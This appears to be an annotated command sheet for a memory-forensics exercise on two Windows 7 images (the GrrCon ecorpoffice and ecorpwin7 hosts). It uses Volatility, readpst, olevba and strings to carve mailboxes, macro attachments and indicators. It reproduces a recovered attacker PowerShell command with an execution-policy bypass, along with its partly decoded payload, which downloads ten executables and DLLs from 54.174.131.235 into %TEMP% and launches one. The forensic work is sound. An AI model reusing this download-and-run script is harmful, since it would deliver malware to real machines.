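# Memory image 1: the ecorpoffice Win7 host. Point VOLATILITY_LOCATION at your own copy
# of the image (VOLATILITY_LOCATION=file://<path>). The original page carried that remark
# as unquoted text after the command, which is a shell syntax error; it is a comment here.
export VOLATILITY_LOCATION=file:///home/sansforensics/Desktop/GrrCon/ecorpoffice/win7ecorpoffice2010-36b02ed3.vmem
export VOLATILITY_PROFILE=Win7SP1x64
# Process listing, then the SIDs (user/group context) of the PID singled out for inspection.
vol.py pslist
vol.py getsids -p 1364
# Network connections and listeners still present in memory.
vol.py netscan
# Find cached Outlook PST file objects and carve the one belonging to phillip.price.
# dumpfiles: -n keeps the original file name, -i makes -r case-insensitive, -r is a regex.
vol.py filescan | grep 'pst$'
vol.py dumpfiles -n -i -r 'phillip.price@e-corp.biz.pst$' -D pst2
# readpst -S writes one file per message so individual attachments can be examined.
readpst -S file.2692.0xfffffa80042dcf10.phillip.price@e-corp.biz.pst.dat
# Inspect VBA macros in the attachment. NOTE: the original page spelt the extension with a
# Cyrillic 'с' (U+0441), "doс", which would not match a file named with a Latin "c";
# corrected here on the assumption that the attachment is an ordinary .doc.
olevba 'phillip.price@e-corp.biz/Inbox/13-bank_statement_088452.doc'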
# Attacker command line as recovered from the image (reproduced as evidence, not as a step to run).
# -ep bypass disables the execution policy, -nop skips profile loading, and -encodedCommand takes
# a base64 blob of a UTF-16LE script. The blob is truncated on this page ("…<code snippet>…"),
# so it cannot be decoded from here in full; the decoded text is reproduced further down.
powershell -ep bypass -nop -encodedCommand ZgBvAHIAZQBhAGMAaAAgACgAJABpACAAaQBuACAAQAAoACIAUwBrAHkAcABlAEMAMgBBAHUAdABvAFUAcABkAGEAdABlAC4AZQB4AGUAIgAsACIAVABlAGEAbQBWAGkAZQB3AGUAcgBfAEQAZQBzAGsAdABvAHAAL…<code snippet>…HYAOgBUAEUATQBQ
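# Decode the -encodedCommand blob. PowerShell encodes it as UTF-16LE (the leading "ZgBvAHIA"
# decodes to the bytes f\0o\0r\0), so plain `base64 -d` prints text interleaved with NUL
# bytes; converting to UTF-8 with iconv yields readable output. The blob below is the
# truncated copy from the page ("…<code snippet>…") and will not decode cleanly as-is.
echo "ZgBvAHIAZQBhAGMAaAAgACgAJABpACAAaQBuACAAQAAoACIAUwBrAHkAcABlAEMAMgBBAHUAdABvAFUAcABkAGEAdABlAC4AZQB4AGUAIgAsACIAVABlAGEAbQBWAGkAZQB3AGUAcgBfAEQAZQBzAGsAdABvAHAAL…<code snippet>…HYAOgBUAEUATQBQ" | base64 -d | iconv -f UTF-16LE -t UTF-8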
# Decoded payload. For each of the ten file names below it downloads
# http://54.174.131.235/files/<name> into %TEMP% via WebClient.DownloadFile, then launches
# SkypeC2AutoUpdate.exe from %TEMP%. The host 54.174.131.235, these file names and the
# %TEMP% paths are the indicators to search for in the rest of the image (see the strings
# searches below). The last line is cut off on the page (unclosed quote after
# -WorkingDirectory), so this is not the complete script.
foreach ($i in @("SkypeC2AutoUpdate.exe","TeamViewer_Desktop.exe","TeamViewer_Resource_en.dll","avicap32.dll","tv_w32.dll","tv_w32.exe","tv_x64.dll","tv_x64.exe","tvr.cfg","vpn.exe")){
(New-Object System.Net.WebClient).DownloadFile("http://54.174.131.235/files/$i", "$env:temp/$i")};
Start-Process -FilePath "$env:TEMP/SkypeC2AutoUpdate.exe" -WorkingDirectory "$env:TEMP
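# Dump the address space of the PID inspected with getsids above into 1364.dmp.
vol.py memdump -p 1364 -D .
# ASCII strings (-a: scan the whole file) around the download host from the decoded payload.
# -F treats the IP as a fixed string so the dots are not regex wildcards.
strings -a 1364.dmp | grep -F -A4 "54.174.131.235"
# Same search over UTF-16LE strings (-el), which is how Windows stores most in-memory text.
# The original page had the typo `string -el`, which is not a command.
strings -el 1364.dmp | grep -F -A10 -B10 "54.174.131.235"
# Any dotted-quad address with surrounding context that also mentions teamviewer.
strings -a 1364.dmp | grep -A3 -B3 -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | grep -A3 -B3 teamviewer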
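# Memory image 2: the ecorpwin7 workstation. VOLATILITY_PROFILE is not re-exported here, so
# the profile from the first image is reused — confirm it is right for this image if in doubt.
export VOLATILITY_LOCATION=file:///home/sansforensics/Desktop/GrrCon/ecorpwin7/ecorpwin7-e73257c4.vmem
vol.py netscan
# Locate cached Outlook PST file objects and carve scott.knowles' mailbox
# (-n keep file name, -i case-insensitive, -r regex); readpst -S splits it one file per message.
vol.py filescan | grep 'pst$'
vol.py dumpfiles -n -i -r 'Outlscott.knowles@e-corp.biz-00000004.pst$' -D .
readpst -S file.2496.0xfffffa80034e9850.Outlscott.knowles@e-corp.biz-00000004.pst.dat
# Recover an RTF attachment: -Q dumps the file object at the given physical offset.
vol.py filescan | grep 'rtf$'
vol.py dumpfiles -Q 0x000000007d6b3850 -D .
# Strip embedded NUL bytes so the dump can be read as a plain RTF file (\x0 is a GNU sed extension).
sed 's/\x0//g' file.None.0xfffffa80040b3260.dat > Important_ECORP_Lawsuit_Washington_Leak.rtf
# Carve any file object whose name matches test.dll into maldll/ for separate analysis.
vol.py dumpfiles -n -i -r test.dll -D maldll
# Build a bodyfile timeline from the $MFT and look for archive files with full macb timestamps.
# Changes from the original: `tail -1000f` dropped the -f (following a pipe is pointless and,
# depending on the tail implementation, can keep the pipeline from exiting); `egrep` replaced
# by `grep -E`; the dots in the extensions are escaped so '.rar' no longer matches e.g. 'arar'.
vol.py mftparser --output=body -D . --output-file=grrcon_mft.body
mactime -b grrcon_mft.body -d -z UTC | tail -n 1000 | grep -Ev 'NULL' | grep -E 'macb' | grep -E '\.(rar|zip|7z|gzip)'
# UTF-16LE strings around the archive name and the .deb name of interest; -F makes the
# dot a literal character rather than a regex wildcard.
strings -el ecorpwin7-e73257c4.vmem | grep -F -A5 -B5 'reports.rar'
strings -el ecorpwin7-e73257c4.vmem | grep -F -A5 -B5 '.deb'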